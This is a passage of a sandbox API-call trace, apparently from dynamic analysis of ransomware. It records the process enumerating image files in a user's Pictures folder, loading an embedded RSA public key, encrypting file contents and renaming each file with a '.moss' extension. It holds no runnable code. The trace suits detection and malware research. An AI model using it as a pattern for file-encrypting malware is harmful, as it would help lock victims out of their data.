[0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e0a0 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e058 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0171.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e040 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50fb0 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.890] WriteFile (in: hFile=0x664, lpBuffer=0x3b4b098*, nNumberOfBytesToWrite=0xc0c, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b4b098*, lpNumberOfBytesWritten=0x401fb14*=0xc0c, lpOverlapped=0x0) returned 1 [0171.892] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.892] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.892] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.892] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.892] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.892] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.892] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.893] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.893] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.893] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.893] CloseHandle (hObject=0x664) returned 1 [0171.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0171.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0171.894] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0171.894] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\7tUnNPl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\7tunnpl.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\7tUnNPl.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\7tunnpl.png.moss")) returned 1 [0171.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.895] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.896] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77711da0, ftCreationTime.dwHighDateTime=0x1d5dcb9, ftLastAccessTime.dwLowDateTime=0xdeff4230, ftLastAccessTime.dwHighDateTime=0x1d5df61, ftLastWriteTime.dwLowDateTime=0xdeff4230, ftLastWriteTime.dwHighDateTime=0x1d5df61, nFileSizeHigh=0x0, nFileSizeLow=0x14ec2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hvGNn3Fg6SmhShQc4pe.gif", cAlternateFileName="HVGNN3~1.GIF")) returned 1 [0171.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0171.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.896] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\hvGNn3Fg6SmhShQc4pe.gif") returned=".gif" [0171.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\hvGNn3Fg6SmhShQc4pe.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\hvgnn3fg6smhshqc4pe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.897] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=85698) returned 1 [0171.897] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.901] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14e9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.901] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.902] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.902] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x14ec2, lpOverlapped=0x0) returned 1 [0171.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.903] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.904] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.904] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.904] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.904] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.904] GetLastError () returned 0x0 [0171.905] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.905] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.905] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.905] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.905] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14ec0) returned 0x3b62d40 [0171.906] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50fb0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e040 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50ff8 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e058 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e088 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e0a0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.906] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e0a0 | out: hHeap=0xcd0000) returned 1 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e0a0 [0171.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e088 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2470 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2588 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e0a0 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.907] GetCurrentThreadId () returned 0x324 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4faa8 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.908] GetCurrentThreadId () returned 0x324 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e088 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0171.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.909] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14ec2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.909] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\hvGNn3Fg6SmhShQc4pe.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\hvgnn3fg6smhshqc4pe.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\hvGNn3Fg6SmhShQc4pe.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\hvgnn3fg6smhshqc4pe.gif.moss")) returned 1 [0171.910] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.910] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.910] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.912] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb82d8a50, ftCreationTime.dwHighDateTime=0x1d5e3ac, ftLastAccessTime.dwLowDateTime=0xea9aa410, ftLastAccessTime.dwHighDateTime=0x1d5dece, ftLastWriteTime.dwLowDateTime=0xea9aa410, 